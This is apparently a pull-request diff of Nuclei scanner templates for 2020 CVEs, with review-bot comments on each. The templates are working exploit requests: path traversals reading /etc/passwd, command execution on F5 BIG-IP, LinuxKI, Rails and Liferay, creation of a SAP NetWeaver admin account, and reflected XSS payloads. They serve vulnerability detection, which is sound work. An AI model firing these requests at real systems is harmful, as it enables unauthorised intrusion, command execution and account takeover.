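Review bot: `name: CVE-2020-3187` just repeats the `id`; give it a descriptive name (product and flaw) like the other templates, add `description:`, and lowercase `severity: High` to match the repository's `high`. The check (status 200 plus `webvpn` / `Webvpn` in the headers of `/+CSCOE+/session_password.html`) confirms a WebVPN portal is present rather than the specific flaw, which the comment should state.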

View File

@ -0,0 +1,19 @@
id: CVE-2020-3452
# Source: https://twitter.com/aboul3la/status/1286012324722155525
info:
name: CVE-2020-3452
author: pdteam
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
matchers:
- type: word
words:
- "INTERNAL_PASSWORD_ENABLED"
- "CONF_VIRTUAL_KEYBOARD"
condition: and
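Review bot: `name: CVE-2020-3452` duplicates the `id`; use a descriptive name and add `description:`. The `# Source:` comment sits between `id:` and `info:`; move the URL into `info` so it stays with the template metadata. Requiring both `INTERNAL_PASSWORD_ENABLED` and `CONF_VIRTUAL_KEYBOARD` with `condition: and` is a good guard against generic error pages.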

View File

@ -0,0 +1,24 @@
id: CVE-2020-5284
info:
name: Next.js .next/ limited path traversal
author: Harsh & Rahul & dwisiswant0
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/_next/static/../server/pages-manifest.json"
matchers-condition: and
matchers:
- type: regex
regex:
- '\{"/_app":".*?_app\.js"'
part: body
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200
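Review bot: `info` lacks `description:`; add one (the `.next/` traversal exposing `server/pages-manifest.json`). Requiring `application/json` in the header and the `\{"/_app":".*?_app\.js"` regex in the body together is a solid low-false-positive check.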

View File

@ -0,0 +1,22 @@
id: CVE-2020-5405
info:
name: Spring Cloud Directory Traversal
author: Harsh Bothra
severity: High
# source:- https://nvd.nist.gov/vuln/detail/CVE-2020-5405
requests:
- method: GET
path:
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
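Review bot: `severity: High` is capitalised while the repository uses lowercase `high`; fix it for consistent filtering. The `# source:- https://nvd.nist.gov/vuln/detail/CVE-2020-5405` comment belongs in `info`, and `description:` is missing.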

View File

@ -0,0 +1,21 @@
id: CVE-2020-5410
info:
name: Directory Traversal in Spring Cloud Config Server
author: mavericknerd
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}:8080/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
- "{{BaseURL}}:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
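Review bot: both paths append `:8080` and `:8888` to `{{BaseURL}}`, so an input that already carries a port (or a path) produces an invalid URL, and an instance on any other port is never tested; keep a port-less `{{BaseURL}}/..%252F...` variant and let the input list carry ports. `info` lacks `description:` and a reference.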

View File

@ -0,0 +1,64 @@
id: CVE-2020-5902
info:
name: F5 BIG-IP TMUI RCE
author: madrobot & dwisiswant0 & ringo
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
- "{{BaseURL}}/hsqldb%0a"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
- "BIG-IP release ([\\d.]+)"
- "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
- "HSQL Database Engine Servlet"
condition: or
part: body
- raw:
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=create%20cli%20alias%20private%20list%20command%20bash
- |
POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=list%20%2Ftmp%2Fnonexistent
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=delete%20cli%20alias%20private%20list
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "h3ll0_w0Rld"
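Review bot: the second request sequence creates the `private list` CLI alias, writes `/tmp/nonexistent` through `fileSave.jsp` and deletes only the alias; the file stays on the appliance, and if a middle step fails the alias stays too. Document both artifacts and the cleanup in comments (or add a final request that removes the file). The `root:[x*]:0:0:` / `BIG-IP release` / license-key regexes in the first block already prove the read primitive, so state why the write-and-execute sequence is needed beyond detection. `info` has no `description:` or reference.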

View File

@ -0,0 +1,37 @@
id: CVE-2020-6287
info:
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
author: dwisiswant0
severity: critical
# Affected Versions: 7.30, 7.31, 7.40, 7.50
# p.s:
# > Don't forget to change the default credentials
# > to create new admin in associated file:
# > `payloads/CVE-2020-6287.xml`
# Ref:
# - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
requests:
- payloads:
data: "payloads/CVE-2020-6287.xml"
raw:
- |
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml; charset=UTF-8
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('data')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
words:
- "urn:CTCWebServiceSi"
part: body
- type: status
status:
- 200
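Review bot: a successful run creates a persistent administrative account on the target from `payloads/CVE-2020-6287.xml`, and the only guidance is "change the default credentials"; add to the comments that the account must be removed after the test and that the credentials in the payload file are effectively secrets. The `urn:CTCWebServiceSi` word also appears in the request namespace, so confirm it is absent from error responses before relying on it as the success signal. The affected-version line should become `description:`.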

View File

@ -0,0 +1,27 @@
id: CVE-2020-7209
info:
name: LinuxKI Toolset 6.01 Remote Command Execution
author: dwisiswant0
severity: critical
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
# https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
requests:
- method: GET
path:
- "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=1%3Becho%20%22bm9uZXhpc3RlbnQ%3D%22%20%7C%20base64%20-d"
headers:
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
matchers-condition: and
matchers:
- type: word
words:
- "nonexistent"
part: body
- type: status
status:
- 200
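Review bot: the comment block already explains the `kivis.php` `pid` parameter reaching `shell_exec`; move it into `description:` and keep the commit URL as a reference. `name:` says `6.01` while the comment says `<= 6.01`; align them. The request executes `echo ... | base64 -d` on the target, which is harmless but should be called out as command execution in the comments.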

View File

@ -0,0 +1,60 @@
id: CVE-2020-7961
info:
name: Liferay Portal Unauthenticated RCE
author: dwisiswant0
severity: critical
# Deserialization of Untrusted Data in
# Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers
# to execute arbitrary code via JSON web services (JSONWS).
# -
# References:
# > https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
requests:
- payloads:
command:
- "systeminfo" # Windows
- "lsb_release -a" # Linux
- "sysctl kern.ostype" # macOS
port:
- "80"
- "443"
- "8080"
attack: sniper
raw:
- |
POST /api/jsonws/invoke HTTP/1.1
Host: {{Hostname}}:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
Content-Length: 4938
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData
X-Requested-With: XMLHttpRequest
cmd2: command
Accept-Encoding: gzip, deflate
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap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
matchers-condition: and
matchers:
- type: word
words:
- "Microsoft Corporation"
- "Distributor ID"
- "kern.ostype"
condition: or
part: body
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- "Microsoft Windows (.*)"
- "kern.ostype: (.*)"
- "Distributor ID: (.*)"
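Review bot: `Host: {{Hostname}}:port` and `cmd2: command` reference the `port` and `command` payload lists by bare name with no substitution markers around them, so as written the literal text `:port` and `command` is sent; wrap them in the payload placeholder syntax the engine expects. `Content-Length: 4938` is fixed while the `cmd` body is shown truncated here, so verify the length against the full body. The comments should also state that the template executes one of `systeminfo` / `lsb_release -a` / `sysctl kern.ostype` on the target, and the Liferay text in the comment block should become `description:`.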

View File

@ -0,0 +1,24 @@
id: CVE-2020-8091
info:
name: TYPO3 Cross-Site Scripting Vulnerability
author: dwisiswant0
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(31337),this.x=1}//"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "31337"
part: body
- type: word
words:
- "application/x-shockwave-flash"
part: header
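Review bot: `info` has no `description:` or reference; add them. The check matches `31337` in a response served as `application/x-shockwave-flash`; a comment on why that string appearing in a Flash response proves the reflection would help reviewers.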

View File

@ -0,0 +1,20 @@
id: CVE-2020-8115
info:
name: Revive Adserver XSS
author: madrobot & dwisiswant0
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex:
- (?mi)window\.location\.replace\(".*alert\(1337\)
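Review bot: `info` has neither `description:` nor a reference; add both. The `(?mi)window\.location\.replace\(".*alert\(1337\)` regex ties the reflected `alert(1337)` to the `window.location.replace(` sink, which is a good false-positive guard; quote the regex like the other templates in this PR for consistency.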

View File

@ -0,0 +1,22 @@
id: CVE-2020-8163
info:
name: Potential Remote Code Execution on Rails
author: tim_koopmans
severity: high
description: Tests for ability to pass user parameters as local variables into partials
# reference: https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/
requests:
- method: GET
path:
- "{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
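Review bot: `description:` says what the template tests, not what the flaw is; reword it to describe the vulnerability (user-controlled parameters reaching partial locals) and keep the test note as a comment. The payload runs `cat /etc/passwd` through `IO.popen` on the target and only the root path is tried, so note both the command execution and that other routes may be the vulnerable ones.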

View File

@ -0,0 +1,33 @@
id: CVE-2020-8191
info:
name: Citrix ADC & NetScaler Gateway Reflected XSS
# Leads to RCE
author: dwisiswant0
severity: high
requests:
- raw:
- |
POST /menu/stapp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
X-NITRO-USER: xpyZxwy6
sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot
matchers-condition: and
matchers:
- type: word
words:
- "</title><script>alert(31337)</script>"
part: body
- type: status
status:
- 200
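Review bot: `Content-Length: 96` is larger than the 90-byte body shown here, so if sent as written the server waits for six more bytes until the connection times out; drop the header or correct it. The `# Leads to RCE` comment is what justifies `severity: high` but is unsupported; put the chain in `description:` with a reference. Matching the unescaped `</title><script>alert(31337)</script>` correctly excludes encoded reflections.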

Some files were not shown because too many files have changed in this diff.